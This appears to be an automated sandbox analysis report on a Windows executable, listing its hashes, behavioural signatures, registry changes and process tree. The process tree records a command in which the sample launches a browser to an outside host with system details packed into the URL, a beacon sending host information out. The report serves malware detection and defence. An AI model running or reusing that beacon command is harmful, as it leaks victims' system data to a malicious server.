Analysis
-
max time kernel
140s -
max time network
159s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 11:27
Static task
static1
Behavioral task
behavioral1
Sample
c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe
Resource
win10v2004-20221111-en
General
-
Target
c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe
-
Size
143KB
-
MD5
a95492c963c5a617b0a145fd02100436
-
SHA1
0851644427a8f03bc0914722b89f6d34d3694f30
-
SHA256
c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03
-
SHA512
224ce1c354d7a108a53ff8c38fae210fde94a64e3c0e68cfc228540827ea79977ca738dfbaec7c272f74da5df671162198e1b87513a608c1b61b1416faa771c7
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45DP:pe9IB83ID5D
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{28188171-6EFC-11ED-B19F-72E6D75F6BEB} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1736 c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe 524 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1736 c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 524 iexplore.exe 524 iexplore.exe 872 IEXPLORE.EXE 872 IEXPLORE.EXE 872 IEXPLORE.EXE 872 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1736 wrote to memory of 1100 1736 c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe 31 PID 1736 wrote to memory of 1100 1736 c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe 31 PID 1736 wrote to memory of 1100 1736 c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe 31 PID 1736 wrote to memory of 1100 1736 c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe 31 PID 1100 wrote to memory of 524 1100 cmd.exe 33 PID 1100 wrote to memory of 524 1100 cmd.exe 33 PID 1100 wrote to memory of 524 1100 cmd.exe 33 PID 1100 wrote to memory of 524 1100 cmd.exe 33 PID 524 wrote to memory of 872 524 iexplore.exe 34 PID 524 wrote to memory of 872 524 iexplore.exe 34 PID 524 wrote to memory of 872 524 iexplore.exe 34 PID 524 wrote to memory of 872 524 iexplore.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe"C:\Users\Admin\AppData\Local\Temp\c76819dd88478298e37429ad583783403010b0360f12089a73b540befb76af03.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5300108^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt36^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=5300108&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt36|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:524 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:872
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5167cfd90cb81d3dddd63f107249a0f2e
SHA139a78631cc336bb71fe7a02eeb91474bbc335eea
SHA2564c527164ea0096494cfd68b9e9167c0587c162106e8ec71edc705963c9fc543b
SHA512013a16d1dc963bf536a156ccb6ea94596887e1d774d6b18636000bbda06b57c135bac00ef046d18022b8512d6abb9bffd3c26b6d10998b4f0e86b46c319b7911
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize472B
MD503ad9fc0b00b5df3165dc2fb1e3b0a3e
SHA1f8243335a8bc24d989bddd346048a055e1d0bdeb
SHA256366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec
SHA512a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize724B
MD5f569e1d183b84e8078dc456192127536
SHA130c537463eed902925300dd07a87d820a713753f
SHA256287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
SHA51249553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD561b80249a1c581420401b5f1e5f7c2a5
SHA1a80f5c71aae6b489a247c9f1f5bb50e70ba017be
SHA25619d5be628b8935966c1baee6fe1a0254d56444710534058a2b92bacd7fca8aa2
SHA512e5da5909094f1e59445ea154dc9de387896676b2fe4487310c7f6116e6b1b0b0ed7af2879f8ce45d107a641436f891911472770cc6a911f0c99946b5f1a9cae0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize402B
MD57f1d2e004c87b58fee21d33e7549e511
SHA1404e1e74122710393a12802edcead5e60542aa06
SHA256aa7b3c114e657609dfb824341e6926b10d3b9656d327df62b969aec41d4eedd6
SHA51299cedfbf57feeacc4038d305d0e8801f4153c4f176057eb1d06f861aefa00fbcd92585a30b41fa7b71105078ca8f800f407d72f749be9ac5c43321f1d6d7bf76
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize340B
MD54cdf079668512a6a7b19643b6e7701e3
SHA1fb8c7957fb3b0f8253e36248d6afd3652d8d6e98
SHA256265cd7deac3656ae747225707e42b4260c272551ca52b1e61d47e0eb3f47038e
SHA5123f363e06a5729b08e73b18de134d3c1f5219afd73c4e5dd72ee39db80c9c41c1bb304068ebdbe224522a5226e085680664926e2e43eea4f6c5a751e20b6504c5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize392B
MD5276a55f5adf0c0f8045aade50bdca3e3
SHA1de5ffaf56093df8f970912541feabc2ba9392dd6
SHA2569c0f1e567cd307f56363738abf0cece0693842b9201d3cc3fb20462537cb435e
SHA5125eac162fa82c411168ccb9604518dfd6161a29dd5760770800d4538730e8b116844fd5a90cc455a7279de8f4c412d1ae9dcfd9d1a9a665bd4c2e3c175b28e8b5